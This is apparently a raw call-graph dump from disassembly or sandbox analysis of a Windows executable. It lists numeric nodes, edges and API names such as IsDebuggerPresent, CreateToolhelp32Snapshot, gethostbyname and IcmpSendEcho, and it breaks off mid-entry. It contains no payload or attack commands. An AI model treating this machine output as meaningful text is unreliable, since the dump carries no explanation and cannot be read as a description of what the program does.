97064->97075 97136 4652b3 97065->97136 97067 443352 97142 465319 97067->97142 97069 443359 97149 4432e6 SystemParametersInfoW SystemParametersInfoW 97069->97149 97071 443360 97150 44338b 97071->97150 97074->97026 97075->97034 97076->97036 97077->97039 97078->97016 97079->97019 97080->97023 97081->97043 97082->97045 97087 47d576 97083->97087 97086 46302d 8 API calls 3 library calls 97086->97046 97090 47d593 97087->97090 97091 47d58f 97087->97091 97089 460248 97089->97049 97089->97086 97090->97091 97093 474f6e 97090->97093 97105 460dfc 97091->97105 97094 474f7a BuildCatchObjectHelperInternal 97093->97094 97112 4732d1 EnterCriticalSection 97094->97112 97096 474f81 97113 475422 97096->97113 97098 474f90 97099 474f9f 97098->97099 97126 474e02 29 API calls 97098->97126 97128 474fbb LeaveCriticalSection _abort 97099->97128 97102 474f9a 97127 474eb8 GetStdHandle GetFileType 97102->97127 97103 474fb0 __fread_nolock 97103->97090 97106 460e07 IsProcessorFeaturePresent 97105->97106 97107 460e05 97105->97107 97109 460fce 97106->97109 97107->97089 97133 460f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97109->97133 97111 4610b1 97111->97089 97112->97096 97114 47542e BuildCatchObjectHelperInternal 97113->97114 97115 475452 97114->97115 97116 47543b 97114->97116 97129 4732d1 EnterCriticalSection 97115->97129 97130 46f649 20 API calls _abort 97116->97130 97119 47545e 97124 475373 __wsopen_s 21 API calls 97119->97124 97125 47548a 97119->97125 97120 475440 97131 472b5c 26 API calls __fread_nolock 97120->97131 97123 47544a __fread_nolock 97123->97098 97124->97119 97132 4754b1 LeaveCriticalSection _abort 97125->97132 97126->97102 97127->97099 97128->97103 97129->97119 97130->97120 97131->97123 97132->97123 97133->97111 97135 460cdc GetStartupInfoW 97134->97135 97135->97062 97137 4652bf BuildCatchObjectHelperInternal 97136->97137 97199 4732d1 EnterCriticalSection 97137->97199 97139 4652ca pre_c_initialization 97200 46530a 97139->97200 97141 4652ff __fread_nolock 97141->97067 97143 465325 97142->97143 97144 46533f 97142->97144 97143->97144 97204 46f649 20 API calls _abort 97143->97204 97144->97069 97146 46532f 97205 472b5c 26 API calls __fread_nolock 97146->97205 97148 46533a 97148->97069 97149->97071 97151 44339b __wsopen_s 97150->97151 97152 44bf73 8 API calls 97151->97152 97153 4433a7 GetCurrentDirectoryW 97152->97153 97206 444fd9 97153->97206 97155 4433ce IsDebuggerPresent 97156 4433dc 97155->97156 97157 483ca3 MessageBoxA 97155->97157 97158 483cbb 97156->97158 97159 4433f0 97156->97159 97157->97158 97324 444176 8 API calls 97158->97324 97274 443a95 97159->97274 97166 443462 97168 483cec SetCurrentDirectoryW 97166->97168 97169 44346a 97166->97169 97168->97169 97170 443475 97169->97170 97325 4a1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 97169->97325 97306 4434d3 7 API calls 97170->97306 97173 483d07 97173->97170 97176 483d19 97173->97176 97326 445594 97176->97326 97177 44347f 97184 443494 97177->97184 97310 44396b 97177->97310 97183 4434af 97184->97183 97320 443907 97184->97320 97199->97139 97203 473319 LeaveCriticalSection 97200->97203 97202 465311 97202->97141 97203->97202 97204->97146 97205->97148 97207 44bf73 8 API calls 97206->97207 97208 444fef 97207->97208 97351 4463d7 97208->97351 97210 44500d 97365 44bd57 97210->97365 97213 44bed9 8 API calls 97214 44502c 97213->97214 97371 44893c 97214->97371 97217 44b329 8 API calls 97218 445045 97217->97218 97219 44be2d 39 API calls 97218->97219 97220 445055 97219->97220 97221 44b329 8 API calls 97220->97221 97222 44507b 97221->97222 97223 44be2d 39 API calls 97222->97223 97224 44508a 97223->97224 97225 44bf73 8 API calls 97224->97225 97226 4450a8 97225->97226 97374 4451ca 97226->97374 97230 4450c2 97231 4450cc 97230->97231 97232 484b23 97230->97232 97234 464d98 _strftime 40 API calls 97231->97234 97233 4451ca 8 API calls 97232->97233 97235 484b37 97233->97235 97236 4450d7 97234->97236 97238 4451ca 8 API calls 97235->97238 97236->97235 97237 4450e1 97236->97237 97239 464d98 _strftime 40 API calls 97237->97239 97241 484b53 97238->97241 97240 4450ec 97239->97240 97240->97241 97242 4450f6 97240->97242 97244 445594 10 API calls 97241->97244 97243 464d98 _strftime 40 API calls 97242->97243 97245 445101 97243->97245 97246 484b76 97244->97246 97247 44510b 97245->97247 97264 484b9f 97245->97264 97248 4451ca 8 API calls 97246->97248 97249 44512e 97247->97249 97253 44bed9 8 API calls 97247->97253 97251 484b82 97248->97251 97255 484bda 97249->97255 97390 447e12 97249->97390 97250 4451ca 8 API calls 97254 484bbd 97250->97254 97252 44bed9 8 API calls 97251->97252 97256 484b90 97252->97256 97257 445121 97253->97257 97258 44bed9 8 API calls 97254->97258 97260 4451ca 8 API calls 97256->97260 97261 4451ca 8 API calls 97257->97261 97262 484bcb 97258->97262 97260->97264 97261->97249 97265 4451ca 8 API calls 97262->97265 97264->97250 97265->97255 97269 44893c 8 API calls 97271 445167 97269->97271 97270 448a60 8 API calls 97270->97271 97271->97269 97271->97270 97272 4451ab 97271->97272 97273 4451ca 8 API calls 97271->97273 97272->97155 97273->97271 97275 443aa2 __wsopen_s 97274->97275 97276 4840da ___scrt_fastfail 97275->97276 97277 443abb 97275->97277 97279 4840f6 GetOpenFileNameW 97276->97279 97438 445851 97277->97438 97281 484145 97279->97281 97283 448577 8 API calls 97281->97283 97286 48415a 97283->97286 97286->97286 98302 443624 7 API calls 97306->98302 97308 44347a 97309 4435b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97308->97309 97309->97177 97324->97166 97325->97173 97327 4822d0 __wsopen_s 97326->97327 97328 4455a1 GetModuleFileNameW 97327->97328 97329 44b329 8 API calls 97328->97329 97330 4455c7 97329->97330 97352 4463e4 __wsopen_s 97351->97352 97353 448577 8 API calls 97352->97353 97354 446416 97352->97354 97353->97354 97363 44644c 97354->97363 97412 44655e 97354->97412 97356 44b329 8 API calls 97357 446543 97356->97357 97359 446a7c 8 API calls 97357->97359 97358 44b329 8 API calls 97358->97363 97360 44654f 97359->97360 97360->97210 97362 44651a 97362->97356 97362->97360 97363->97358 97363->97362 97364 44655e 8 API calls 97363->97364 97415 446a7c 97363->97415 97364->97363 97366 44bd71 97365->97366 97370 445021 97365->97370 97367 46014b 8 API calls 97366->97367 97368 44bd7b 97367->97368 97369 46017b 8 API calls 97368->97369 97369->97370 97370->97213 97372 46014b 8 API calls 97371->97372 97373 445038 97372->97373 97373->97217 97375 4451f2 97374->97375 97377 4451d4 97374->97377 97376 448577 8 API calls 97375->97376 97378 4450b4 97376->97378 97377->97378 97379 44bed9 8 API calls 97377->97379 97380 464d98 97378->97380 97379->97378 97381 464da6 97380->97381 97382 464e1b 97380->97382 97389 464dcb 97381->97389 97421 46f649 20 API calls _abort 97381->97421 97423 464e2d 40 API calls 3 library calls 97382->97423 97385 464e28 97385->97230 97386 464db2 97422 472b5c 26 API calls __fread_nolock 97386->97422 97388 464dbd 97388->97230 97389->97230 97391 447e1a 97390->97391 97392 46014b 8 API calls 97391->97392 97393 447e28 97392->97393 97424 448445 97393->97424 97396 448470 97427 44c760 97396->97427 97398 448480 97399 46017b 8 API calls 97398->97399 97400 44514c 97398->97400 97399->97400 97401 448a60 97400->97401 97402 448a76 97401->97402 97403 486737 97402->97403 97408 448a80 97402->97408 97436 45b7a2 8 API calls 97403->97436 97404 486744 97437 44b4c8 8 API calls 97404->97437 97407 486762 97407->97407 97408->97404 97409 448b94 97408->97409 97411 448b9b 97408->97411 97410 46014b 8 API calls 97409->97410 97410->97411 97411->97271 97413 44c2c9 8 API calls 97412->97413 97414 446569 97413->97414 97414->97354 97416 446a8b 97415->97416 97420 446aac __fread_nolock 97415->97420 97418 46017b 8 API calls 97416->97418 97417 46014b 8 API calls 97419 446abf 97417->97419 97418->97420 97419->97363 97420->97417 97421->97386 97422->97388 97423->97385 97425 46014b 8 API calls 97424->97425 97426 44513e 97425->97426 97426->97396 97428 44c76b 97427->97428 97429 491285 97428->97429 97434 44c773 ISource 97428->97434 97430 46014b 8 API calls 97429->97430 97432 491291 97430->97432 97431 44c77a 97431->97398 97434->97431 97435 44c7e0 8 API calls ISource 97434->97435 97435->97434 97436->97404 97437->97407 97495 4822d0 97438->97495 97441 44587d 97443 448577 8 API calls 97441->97443 97442 445898 97444 44bd57 8 API calls 97442->97444 97445 445889 97443->97445 97444->97445 97497 4455dc 97445->97497 97496 44585e GetFullPathNameW 97495->97496 97496->97441 97496->97442 98302->97308 98366 4436f5 98369 44370f 98366->98369 98370 443726 98369->98370 98371 44378a 98370->98371 98372 44372b 98370->98372 98409 443788 98370->98409 98374 443790 98371->98374 98375 483df4 98371->98375 98376 443804 PostQuitMessage 98372->98376 98377 443738 98372->98377 98373 44376f DefWindowProcW 98411 443709 98373->98411 98378 443797 98374->98378 98379 4437bc SetTimer RegisterWindowMessageW 98374->98379 98424 442f92 10 API calls 98375->98424 98376->98411 98380 443743 98377->98380 98381 483e61 98377->98381 98384 4437a0 KillTimer 98378->98384 98385 483d95 98378->98385 98386 4437e5 CreatePopupMenu 98379->98386 98379->98411 98387 44374d 98380->98387 98388 44380e 98380->98388 98427 4ac8f7 65 API calls ___scrt_fastfail 98381->98427 98383 483e15 98425 45f23c 40 API calls 98383->98425 98395 443907 Shell_NotifyIconW 98384->98395 98393 483d9a 98385->98393 98394 483dd0 MoveWindow 98385->98394 98386->98411 98396 443758 98387->98396 98397 483e46 98387->98397 98414 45fcad 98388->98414 98390 483e73 98390->98373 98390->98411 98399 483dbf SetFocus 98393->98399 98400 483da0 98393->98400 98394->98411 98401 4437b3 98395->98401 98398 4437f2 98396->98398 98407 443763 98396->98407 98397->98373 98426 4a1423 8 API calls 98397->98426 98422 44381f 75 API calls ___scrt_fastfail 98398->98422 98399->98411 98403 483da9 98400->98403 98400->98407 98421 4459ff DeleteObject DestroyWindow 98401->98421 98423 442f92 10 API calls 98403->98423 98406 443802 98406->98411 98407->98373 98410 443907 Shell_NotifyIconW 98407->98410 98409->98373 98412 483e3a 98410->98412 98413 44396b 60 API calls 98412->98413 98413->98409 98415 45fcc5 ___scrt_fastfail 98414->98415 98416 45fd4b 98414->98416 98417 4461a9 55 API calls 98415->98417 98416->98411 98418 45fcec 98417->98418 98419 45fd34 KillTimer SetTimer 98418->98419 98420 49fe2b Shell_NotifyIconW 98418->98420 98419->98416 98420->98419 98421->98411 98422->98406 98423->98411 98424->98383 98425->98407 98426->98409 98427->98390 98428 44b8d1 98437 4491c8 98428->98437 98430 44b8e2 98431 44b90c 98430->98431 98445 44bd07 8 API calls 98430->98445 98433 44bba9 8 API calls 98431->98433 98436 44b7d7 98433->98436 98434 44b900 98435 44bba9 8 API calls 98434->98435 98435->98431 98438 44bd57 8 API calls 98437->98438 98444 4491d7 98438->98444 98439 486bfe 98446 4aa05c 83 API calls __wsopen_s 98439->98446 98441 449225 98441->98430 98442 486c0c 98443 44ad40 8 API calls 98443->98444 98444->98439 98444->98441 98444->98443 98445->98434 98446->98442 98447 441033 98452 4468b4 98447->98452 98451 441042 98453 44bf73 8 API calls 98452->98453 98454 446922 98453->98454 98461 44589f 98454->98461 98456 4857bd 98458 4469bf 98458->98456 98459 441038 98458->98459 98464 446b14 8 API calls __fread_nolock 98458->98464 98460 460413 29 API calls __onexit 98459->98460 98460->98451 98465 4458cb 98461->98465 98464->98458 98466 4458be 98465->98466 98467 4458d8 98465->98467 98466->98458 98467->98466 98468 4458df RegOpenKeyExW 98467->98468 98468->98466 98469 4458f9 RegQueryValueExW 98468->98469 98470 44592f RegCloseKey 98469->98470 98471 44591a 98469->98471 98470->98466 98471->98470 98472 44b893 98473 44b89d 98472->98473 98474 44bba9 8 API calls 98473->98474 98497 44b5b0 __fread_nolock 98474->98497 98475 44b7bb 98476 44bba9 8 API calls 98475->98476 98479 44b7d5 98476->98479 98480 44bd57 8 API calls 98480->98497 98481 490cfd 98504 4aa05c 83 API calls __wsopen_s 98481->98504 98482 44bba9 8 API calls 98482->98497 98483 490bd6 98489 46014b 8 API calls 98483->98489 98485 44bb0d 98485->98479 98505 4aa05c 83 API calls __wsopen_s 98485->98505 98488 490d0b 98490 44bba9 8 API calls 98488->98490 98491 490bf7 98489->98491 98492 490d21 98490->98492 98493 46017b 8 API calls 98491->98493 98492->98479 98494 490c31 __fread_nolock 98493->98494 98494->98481 98494->98485 98495 44c2c9 8 API calls 98498 44b78c CharUpperBuffW 98495->98498 98497->98475 98497->98480 98497->98481 98497->98482 98497->98483 98497->98485 98497->98494 98497->98495 98499 46017b 8 API calls 98497->98499 98500 448f3a 40 API calls _wcslen 98497->98500 98501 44bd07 8 API calls 98497->98501 98502 447c50 9 API calls __fread_nolock 98497->98502 98503 44ad40 8 API calls __fread_nolock 98497->98503 98498->98497 98499->98497 98500->98497 98501->98497 98502->98497 98503->98497 98504->98488 98505->98479 98506 44f4dc 98509 44cab0 98506->98509 98510 44cacb 98509->98510 98511 49150c 98510->98511 98512 4914be 98510->98512 98539 44caf0 98510->98539 98554 4c62ff 243 API calls 2 library calls 98511->98554 98515 4914c8 98512->98515 98518 4914d5 98512->98518 98512->98539 98552 4c6790 243 API calls 98515->98552 98531 44cdc0 98518->98531 98553 4c6c2d 243 API calls 2 library calls 98518->98553 98521 49179f 98521->98521 98523 45e807 39 API calls 98523->98539 98526 44cdee 98527 4916e8 98557 4c6669 81 API calls 98527->98557 98530 44be2d 39 API calls 98530->98539 98531->98526 98558 4b3fe1 81 API calls __wsopen_s 98531->98558 98535 44cf80 39 API calls 98535->98539 98536 450340 243 API calls 98536->98539 98537 44bed9 8 API calls 98537->98539 98539->98523 98539->98526 98539->98527 98539->98530 98539->98531 98539->98535 98539->98536 98539->98537 98540 45e7c1 39 API calls 98539->98540 98541 45aa99 243 API calls 98539->98541 98542 4605b2 5 API calls __Init_thread_wait 98539->98542 98543 45bc58 98539->98543 98548 460413 29 API calls __onexit 98539->98548 98549 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98539->98549 98550 45f4df 81 API calls 98539->98550 98551 45f346 243 API calls 98539->98551 98555 44b4c8 8 API calls 98539->98555 98556 49ffaf 8 API calls 98539->98556 98540->98539 98541->98539 98542->98539 98544 46014b 8 API calls 98543->98544 98545 45bc65 98544->98545 98546 44b329 8 API calls 98545->98546 98547 45bc70 98546->98547 98547->98539 98548->98539 98549->98539 98550->98539 98551->98539 98552->98518 98553->98531 98554->98539 98555->98539 98556->98539 98557->98531 98558->98521 98559 495650 98568 45e3d5 98559->98568 98561 495666 98567 4956e1 98561->98567 98577 45aa65 9 API calls 98561->98577 98564 4956c1 98564->98567 98578 4b247e 8 API calls 98564->98578 98565 4961d7 98567->98565 98579 4b3fe1 81 API calls __wsopen_s 98567->98579 98569 45e3f6 98568->98569 98570 45e3e3 98568->98570 98571 45e429 98569->98571 98572 45e3fb 98569->98572 98580 44b4c8 8 API calls 98570->98580 98581 44b4c8 8 API calls 98571->98581 98574 46014b 8 API calls 98572->98574 98576 45e3ed 98574->98576 98576->98561 98577->98564 98578->98567 98579->98565 98580->98576 98581->98576 98582 44dd3d 98583 44dd63 98582->98583 98584 4919c2 98582->98584 98588 46014b 8 API calls 98583->98588 98605 44dead 98583->98605 98585 491a46 98584->98585 98587 491a82 98584->98587 98591 491a26 98584->98591 98604 491a7d 98585->98604 98626 4b3fe1 81 API calls __wsopen_s 98585->98626 98627 4b3fe1 81 API calls __wsopen_s 98587->98627 98592 44dd8d 98588->98592 98589 46017b 8 API calls 98598 44dee4 __fread_nolock 98589->98598 98625 45e6e8 243 API calls 98591->98625 98594 46014b 8 API calls 98592->98594 98592->98598 98595 44dddb 98594->98595 98595->98591 98597 44de16 98595->98597 98596 46017b 8 API calls 98596->98598 98599 450340 243 API calls 98597->98599 98598->98585 98598->98596 98600 44de29 98599->98600 98600->98598 98601 491aa5 98600->98601 98602 44de77 98600->98602 98600->98604 98606 44d526 98600->98606 98628 4b3fe1 81 API calls __wsopen_s 98601->98628 98602->98605 98602->98606 98605->98589 98607 46014b 8 API calls 98606->98607 98608 44d589 98607->98608 98609 44c32d 8 API calls 98608->98609 98610 44d5b3 98609->98610 98611 46014b 8 API calls 98610->98611 98619 44d66e ISource 98611->98619 98612 44c3ab 8 API calls 98622 44d9ac ISource 98612->98622 98615 491f79 98630 4a56ae 8 API calls ISource 98615->98630 98617 491f94 98618 44bed9 8 API calls 98618->98619 98619->98615 98619->98617 98619->98618 98620 44c3ab 8 API calls 98619->98620 98621 44d911 ISource 98619->98621 98629 44b4c8 8 API calls 98619->98629 98620->98619 98621->98612 98621->98622 98623 44d9c3 98622->98623 98624 45e30a 8 API calls ISource 98622->98624 98624->98622 98625->98585 98626->98604 98627->98604 98628->98604 98629->98619 98630->98617 98631 450ebf 98632 450ed3 98631->98632 98637 451425 98631->98637 98633 450ee5 98632->98633 98634 46014b 8 API calls 98632->98634 98635 49562c 98633->98635 98638 450f3e 98633->98638 98735 44b4c8 8 API calls 98633->98735 98634->98633 98736 4b1b14 8 API calls 98635->98736 98637->98633 98641 44bed9 8 API calls 98637->98641 98656 45049d ISource 98638->98656 98664 452b20 98638->98664 98641->98633 98642 49632b 98740 4b3fe1 81 API calls __wsopen_s 98642->98740 98643 451695 98651 44bed9 8 API calls 98643->98651 98643->98656 98646 46014b 8 API calls 98659 450376 ISource 98646->98659 98647 49625a 98739 4b3fe1 81 API calls __wsopen_s 98647->98739 98648 495cdb 98654 44bed9 8 API calls 98648->98654 98648->98656 98651->98656 98652 44bed9 8 API calls 98652->98659 98654->98656 98655 44bf73 8 API calls 98655->98659 98657 4605b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98657->98659 98658 450aae ISource 98738 4b3fe1 81 API calls __wsopen_s 98658->98738 98659->98642 98659->98643 98659->98646 98659->98647 98659->98648 98659->98652 98659->98655 98659->98656 98659->98657 98659->98658 98660 496115 98659->98660 98661 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98659->98661 98663 460413 29 API calls pre_c_initialization 98659->98663 98733 451990 243 API calls 2 library calls 98659->98733 98734 451e50 40 API calls ISource 98659->98734 98737 4b3fe1 81 API calls __wsopen_s 98660->98737 98661->98659 98663->98659 98665 452b86 98664->98665 98666 452fc0 98664->98666 98668 497bd8 98665->98668 98669 452ba0 98665->98669 99083 4605b2 5 API calls __Init_thread_wait 98666->99083 99046 4c7af9 98668->99046 98672 453160 9 API calls 98669->98672 98671 452fca 98675 44b329 8 API calls 98671->98675 98681 45300b 98671->98681 98674 452bb0 98672->98674 98673 497be4 98673->98659 98676 453160 9 API calls 98674->98676 98684 452fe4 98675->98684 98677 452bc6 98676->98677 98679 452bfc 98677->98679 98677->98681 98678 497bed 98678->98659 98680 497bfd 98679->98680 98688 452c18 __fread_nolock 98679->98688 99088 4b3fe1 81 API calls __wsopen_s 98680->99088 98681->98678 99085 44b4c8 8 API calls 98681->99085 99084 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98684->99084 98685 453049 99086 45e6e8 243 API calls 98685->99086 98687 497c15 99089 4b3fe1 81 API calls __wsopen_s 98687->99089 98688->98685 98688->98687 98696 46014b 8 API calls 98688->98696 98698 46017b 8 API calls 98688->98698 98703 450340 243 API calls 98688->98703 98704 452d3f 98688->98704 98706 497c59 98688->98706 98709 497c10 98688->98709 98691 453082 99087 45fe39 8 API calls 98691->99087 98692 497c78 99091 4c61a2 53 API calls _wcslen 98692->99091 98693 452d4c 98694 453160 9 API calls 98693->98694 98697 452d59 98694->98697 98696->98688 98700 497da1 98697->98700 98701 453160 9 API calls 98697->98701 98698->98688 98700->98709 99092 4b3fe1 81 API calls __wsopen_s 98700->99092 98705 452d73 98701->98705 98703->98688 98704->98692 98704->98693 98705->98700 98708 44bed9 8 API calls 98705->98708 98711 452dd7 ISource 98705->98711 99090 4b3fe1 81 API calls __wsopen_s 98706->99090 98708->98711 98709->98659 98710 453160 9 API calls 98710->98711 98711->98691 98711->98700 98711->98709 98711->98710 98714 452e8b ISource 98711->98714 98721 446c48 3 API calls 98711->98721 98722 447aab FindCloseChangeNotification 98711->98722 98724 44bd57 8 API calls 98711->98724 98741 4ca6aa 98711->98741 98749 45befb 98711->98749 98804 4ca5b2 98711->98804 98810 4c9fe8 98711->98810 98813 4b5fc0 98711->98813 98843 4b664c 98711->98843 98850 45f950 98711->98850 98857 4cad47 98711->98857 98862 4b8e1f 98711->98862 98865 4add79 98711->98865 98868 4c0fb8 98711->98868 98893 4b669f 98711->98893 98898 4b7e8f 98711->98898 98952 45ac3e 98711->98952 98971 448bda 98711->98971 98712 452f2d 98712->98659 98714->98712 99082 45e322 8 API calls ISource 98714->99082 98721->98711 98722->98711 98724->98711 98733->98659 98734->98659 98735->98633 98736->98656 98737->98658 98738->98656 98739->98656 98740->98656 98742 4ca705 98741->98742 98748 4ca6c5 98741->98748 98746 4ca723 98742->98746 99125 44c98d 98742->99125 98743 44c98d 39 API calls 98745 4ca780 98743->98745 99093 4b0372 98745->99093 98746->98743 98746->98745 98746->98748 98748->98711 99186 446c03 98749->99186 98752 46014b 8 API calls 98754 45bf2c 98752->98754 98755 46017b 8 API calls 98754->98755 98757 45bf3d 98755->98757 98756 498fd4 98796 45bfa5 98756->98796 99222 4ba6ef 39 API calls 98756->99222 98758 447aab FindCloseChangeNotification 98757->98758 98759 45bf48 98758->98759 98762 44bf73 8 API calls 98759->98762 98760 44c98d 39 API calls 98761 499036 98760->98761 98763 45bfb2 98761->98763 98764 49903e 98761->98764 98765 45bf50 98762->98765 98768 45fdbb 3 API calls 98763->98768 98766 44c98d 39 API calls 98764->98766 98767 447aab FindCloseChangeNotification 98765->98767 98773 45bfb9 98766->98773 98769 45bf57 98767->98769 98768->98773 98770 448ec0 52 API calls 98769->98770 98771 45bf63 98770->98771 98772 447aab FindCloseChangeNotification 98771->98772 98774 45bf6d 98772->98774 98775 45bfd4 98773->98775 98776 499053 98773->98776 98777 446fa2 5 API calls 98774->98777 98778 447ad5 8 API calls 98775->98778 98779 46017b 8 API calls 98776->98779 98780 45bf7e 98777->98780 98781 45bfdc 98778->98781 98785 499058 98779->98785 98782 498fcc 98780->98782 98788 45bf86 98780->98788 99200 45c042 98781->99200 99221 447a7b FindCloseChangeNotification ISource 98782->99221 98784 49906c 98786 4b1844 8 API calls 98784->98786 98794 499070 __fread_nolock 98784->98794 98785->98784 98790 443b1c 2 API calls 98785->98790 98786->98794 98791 446c5f 13 API calls 98788->98791 98789 45bfeb 98789->98794 99214 447b1a 98789->99214 98790->98784 98793 45bf94 98791->98793 98795 446c48 3 API calls 98793->98795 98802 45bf9b 98795->98802 98796->98760 98796->98763 98797 45bfff 98798 45c039 98797->98798 98799 447aab FindCloseChangeNotification 98797->98799 98798->98711 98800 45c02d 98799->98800 98800->98798 99220 447a7b FindCloseChangeNotification ISource 98800->99220 98801 4ad5aa 4 API calls 98801->98796 98802->98796 98802->98801 98808 4ca5c5 98804->98808 98805 448ec0 52 API calls 98806 4ca632 98805->98806 99252 4b18a9 98806->99252 98808->98805 98809 4ca5d4 98808->98809 98809->98711 99293 4c89b6 98810->99293 98812 4c9ff8 98812->98711 98814 4b5fdf 98813->98814 98839 4b60a8 98813->98839 98815 44c98d 39 API calls 98814->98815 98816 4b5fea 98815->98816 98818 44c98d 39 API calls 98816->98818 98817 448ec0 52 API calls 98819 4b60da 98817->98819 98820 4b6000 98818->98820 98821 448ec0 52 API calls 98819->98821 98823 44bf73 8 API calls 98820->98823 98820->98839 98822 4b60ec 98821->98822 99381 4ad921 98822->99381 98825 4b6011 98823->98825 98827 44bf73 8 API calls 98825->98827 98826 4b60fc 98826->98711 98828 4b601a 98827->98828 98829 448ec0 52 API calls 98828->98829 98830 4b6027 98829->98830 98831 44568e 8 API calls 98830->98831 98832 4b603a 98831->98832 98833 447bb5 8 API calls 98832->98833 98834 4b604b 98833->98834 98835 4b6074 98834->98835 98836 4add79 4 API calls 98834->98836 98837 44c98d 39 API calls 98835->98837 98838 4b605a 98836->98838 98837->98839 98838->98835 98840 44b329 8 API calls 98838->98840 98839->98817 98839->98826 98841 4b606b 98840->98841 99424 4adb6c 98841->99424 98844 448ec0 52 API calls 98843->98844 98845 4b6662 98844->98845 99505 4adc54 98845->99505 98847 4b666a 98848 4b666e GetLastError 98847->98848 98849 4b6683 98847->98849 98848->98849 98849->98711 98851 44c98d 39 API calls 98850->98851 98852 45f964 98851->98852 98853 49fb20 Sleep 98852->98853 98854 45f96c timeGetTime 98852->98854 98855 44c98d 39 API calls 98854->98855 98856 45f982 98855->98856 98856->98711 98858 448ec0 52 API calls 98857->98858 98859 4cad63 98858->98859 99530 4add87 CreateToolhelp32Snapshot Process32FirstW 98859->99530 98861 4cad72 98861->98711 99548 4ba328 98862->99548 98864 4b8e2f 98864->98711 99664 4ae472 lstrlenW 98865->99664 98869 4c0fe1 98868->98869 98870 4c100f WSAStartup 98869->98870 98871 44c98d 39 API calls 98869->98871 98872 4c1054 98870->98872 98882 4c1023 ISource 98870->98882 98873 4c0ffc 98871->98873 98874 45c1f6 8 API calls 98872->98874 98873->98870 98877 44c98d 39 API calls 98873->98877 98875 4c105d 98874->98875 98876 448ec0 52 API calls 98875->98876 98878 4c1069 98876->98878 98879 4c100b 98877->98879 98880 45f9d4 10 API calls 98878->98880 98879->98870 98881 4c1075 inet_addr gethostbyname 98880->98881 98881->98882 98883 4c1093 IcmpCreateFile 98881->98883 98882->98711 98883->98882 98884 4c10d3 98883->98884 98885 46017b 8 API calls 98884->98885 98886 4c10ec 98885->98886 98887 44423c 8 API calls 98886->98887 98888 4c10f7 98887->98888 98889 4c112b IcmpSendEcho 98888->98889 98890 4c1102 IcmpSendEcho 98888->98890 98891 4c114c 98889->98891 98890->98891 98892 4c1212 IcmpCloseHandle WSACleanup 98891->98892 98892->98882 98894 448ec0 52 API calls 98893->98894 98895 4b66b2 98894->98895 98896 4ae472 4 API calls 98895->98896 98897 4b66bc 98896->98897 98897->98711 98899 4b7eb9 98898->98899 98900 4b7eae 98898->98900 98904 44bf73 8 API calls 98899->98904 98939 4b7f99 98899->98939 98901 44c98d 39 API calls 98900->98901 98901->98899 98902 46014b 8 API calls 98903 4b7fcc 98902->98903 98905 46017b 8 API calls 98903->98905 98906 4b7eda 98904->98906 98907 4b7fdd 98905->98907 98908 44bf73 8 API calls 98906->98908 98910 447aab FindCloseChangeNotification 98907->98910 98909 4b7ee3 98908->98909 98911 448ec0 52 API calls 98909->98911 98912 4b7fe8 98910->98912 98913 4b7eef 98911->98913 98914 44bf73 8 API calls 98912->98914 98915 44568e 8 API calls 98913->98915 98916 4b7ff0 98914->98916 98917 4b7f04 98915->98917 98918 447aab FindCloseChangeNotification 98916->98918 98919 447bb5 8 API calls 98917->98919 98920 4b7ff7 98918->98920 98921 4b7f37 98919->98921 98922 448ec0 52 API calls 98920->98922 98924 4add79 4 API calls 98921->98924 98940 4b7f61 98921->98940 98923 4b8003 98922->98923 98925 447aab FindCloseChangeNotification 98923->98925 98927 4b7f47 98924->98927 98928 4b800d 98925->98928 98926 44c98d 39 API calls 98926->98939 98930 44b329 8 API calls 98927->98930 98927->98940 98929 446fa2 5 API calls 98928->98929 98931 4b8027 98929->98931 98932 4b7f58 98930->98932 98933 4b802f 98931->98933 98934 4b8123 GetLastError 98931->98934 98935 4adb6c 12 API calls 98932->98935 98937 446c5f 13 API calls 98933->98937 98936 4b813c 98934->98936 98935->98940 99670 447a7b FindCloseChangeNotification ISource 98936->99670 98941 4b803d 98937->98941 98939->98902 98950 4b80e9 98939->98950 98940->98926 98942 446c48 3 API calls 98941->98942 98945 4b8044 98942->98945 98943 4b808a 98944 46014b 8 API calls 98943->98944 98946 4b80be 98944->98946 98945->98943 98947 4ad5aa 4 API calls 98945->98947 98948 44bf73 8 API calls 98946->98948 98947->98943 98949 4b80cb 98948->98949 98949->98950 99669 4a4ad3 8 API calls __fread_nolock 98949->99669 98950->98711 98953 448ec0 52 API calls 98952->98953 98954 45ac68 98953->98954 98955 45bc58 8 API calls 98954->98955 98956 45ac7f 98955->98956 98957 44c98d 39 API calls 98956->98957 98967 45b09b _wcslen 98956->98967 98957->98967 98958 464d98 _strftime 40 API calls 98958->98967 98959 447ad5 8 API calls 98959->98967 98960 45bbbe 43 API calls 98960->98967 98961 447b1a 8 API calls 98961->98967 98963 446c03 8 API calls 98963->98967 98964 44c98d 39 API calls 98964->98967 98965 45b1fb 98965->98711 98966 448ec0 52 API calls 98966->98967 98967->98958 98967->98959 98967->98960 98967->98961 98967->98963 98967->98964 98967->98965 98967->98966 98968 448577 8 API calls 98967->98968 98969 443907 Shell_NotifyIconW 98967->98969 98970 44396b 60 API calls 98967->98970 99671 44ad40 8 API calls __fread_nolock 98967->99671 98968->98967 98969->98967 98970->98967 98972 448ec0 52 API calls 98971->98972 98973 448bf9 98972->98973 98974 448ec0 52 API calls 98973->98974 98975 448c0e 98974->98975 98976 448ec0 52 API calls 98975->98976 98977 448c21 98976->98977 98978 448ec0 52 API calls 98977->98978 98979 448c37 98978->98979 98980 447ad5 8 API calls 98979->98980 98981 448c4b 98980->98981 98982 486767 98981->98982 98983 44c98d 39 API calls 98981->98983 98985 447e12 8 API calls 98982->98985 98984 448c72 98983->98984 98984->98982 99005 448c98 try_get_first_available_module 98984->99005 98986 486786 98985->98986 98987 448470 8 API calls 98986->98987 98988 486798 98987->98988 98992 448a60 8 API calls 98988->98992 99004 4867bd 98988->99004 98989 447e12 8 API calls 98993 448d4e 98989->98993 98990 448d3c 98990->98989 98991 448ec0 52 API calls 98994 448d27 98991->98994 98992->99004 98995 448d5c 98993->98995 98996 486873 98993->98996 99000 448ec0 52 API calls 98994->99000 99002 